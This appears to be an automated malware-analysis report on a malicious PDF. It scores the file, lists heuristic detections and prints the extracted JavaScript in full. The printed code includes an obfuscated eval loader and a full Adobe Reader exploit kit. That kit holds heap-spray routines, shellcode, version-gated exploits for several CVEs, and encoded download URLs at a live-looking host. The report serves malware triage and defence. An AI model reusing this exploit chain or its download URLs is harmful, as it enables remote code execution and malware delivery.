MALICIOUS
550
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.001 Malicious Link
The PDF file contains embedded JavaScript that exploits known vulnerabilities (CVE-2009-0927 and CVE-2007-5659). The JavaScript is obfuscated and uses eval() to execute, indicating an attempt to download and run a secondary payload. The presence of multiple JavaScript streams and a deobfuscated stage suggests a multi-stage attack. No specific family could be identified.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 12
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after nested-decoder de-obfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
eval(s("function%20EN__WJ1e%28%29%7Breturn%20unescape%3B%7D%0D%0Aperc%3D%22%25%22%3B%0D%0Adogma%3Dthis.info.autor%3B")); -
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.2iii.org/firefox/l.php?i=4 Referenced by PDF JavaScript
- http://www.2iii.org/firefox/l.php?i=5Referenced by PDF JavaScript
- http://www.2iii.org/firefox/l.php?i=6Referenced by PDF JavaScript
🗂 Part of campaign:
2iii.org
14 samples
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0015_000.js |
pdf-javascript-stream | PDF /JS object 15 at offset 0x14F | 275 bytes |
SHA-256: ed9cfc402fb4c45c5099b7f99605abed333bb475cf6cb3f2304d3f47c18291df |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/
s = this['u'+'nes' + 'cape'];
eval(s("function%20EN__WJ1e%28%29%7Breturn%20unescape%3B%7D%0D%0Aperc%3D%22%25%22%3B%0D%0Adogma%3Dthis.info.autor%3B"));
/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/
|
|||
javascript_obj0017_001.js |
pdf-javascript-stream | PDF /JS object 17 at offset 0xE90 | 174 bytes |
SHA-256: 21148ef5b086d126e0d668173425d4857248103dc1823e85f4ed80fed521c549 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/ Function(EN__WJ1e()((dogma.replace(/z/g, perc))))(); /*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/ |
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x29F | 6414 bytes |
SHA-256: 6e6db4e06d6aaa75973997466380b29e4b254ff097106805d5c59e7c70a3eae1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var skd="%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070";var skd1="%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01EF%u0000%u45C7%u0000%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9%u97E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u9D1A%u3E88%uA715%u2C0E%u31FF%uB678%uBFA5%u5579%uD3EF%uE3E1%u79BE%uF964%u0C2D%u8386%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B%u0318%u147D%u16B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE8C%uFFFF%uC033%u078A%uC8D2%uC132%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u772F%u7777%u322E%u6969%u2E69%u726F%u2F67%u6966%u6572%u6F66%u2F78%u2E6C%u6870%u3F70%u3D69%u0034";var skd2=skd+"%u7468%u7074%u2F3A%u772F%u7777%u322E%u6969%u2E69%u726F%u2F67%u6966%u6572%u6F66%u2F78%u2E6C%u6870%u3F70%u3D69%u0035%u9000";var skd3=skd+"%u7468%u7074%u2F3A%u772F%u7777%u322E%u6969%u2E69%u726F%u2F67%u6966%u6572%u6F66%u2F78%u2E6C%u6870%u3F70%u3D69%u0036%u9000";function fix_it(yarsp, len){while (yarsp.length * 2 < len){yarsp += yarsp;}yarsp = yarsp.substring(0, len / 2);return yarsp;}function collab(){var mem_array = new Array();var cc = 0x0c0c0c0c;var addr = 0x400000;var payload = unescape(skd1);var sc_len = payload.length * 2;var len = addr - (sc_len + 0x38);var yarsp = unescape("%u9090%u9090");yarsp = fix_it(yarsp, len);var count2 = (cc - 0x400000) / addr;for (var count = 0; count < count2; count ++ ){mem_array[count] = yarsp + payload;}var overflow = unescape("%u0c0c%u0c0c");while (overflow.length < 44952){overflow += overflow;}this.collabStore = Collab.collectEmailInfo({subj:"", msg:overflow});}function printf(){nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload = unescape(skd2);heapblock = nop + payload;bigblock = unescape("%u0A0A%u0A0A");headersize = 20;spray = headersize + heapblock.length;while (bigblock.length < spray){bigblock += bigblock;}fillblock = bigblock.substring(0, spray);block = bigblock.substring(0, bigblock.length - spray);while (block.length + spray < 0x40000){block = block + block + fillblock;}mem = new Array();for (i = 0; i < 1400; i ++ ){mem[i] = block + heapblock;}var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f", num);}function geticon(){var arry = new Array();if (app.doc.Collab.getIcon){var payload = unescape(skd3);var hWq500CN = payload.length * 2;var len = 0x400000 - (hWq500CN + 0x38);var yarsp = unescape("%u9090%u9090");yarsp = fix_it(yarsp, len);var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){arry[vqcQD96y] = yarsp + payload;}var tUMhNbGw = unescape(" ");while (tUMhNbGw.length < 0x4000){tUMhNbGw += tUMhNbGw;}tUMhNbGw = "N." + tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}aPlugins = app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for (var i=0; i < aPlugins.length; i++){if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}if ((sv==8)&&(lv<=8.12)){geticon();}else if (lv==7.1){printf();}else if (((sv==6)||(sv==7))&&(lv<7.11)){collab();}else{}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.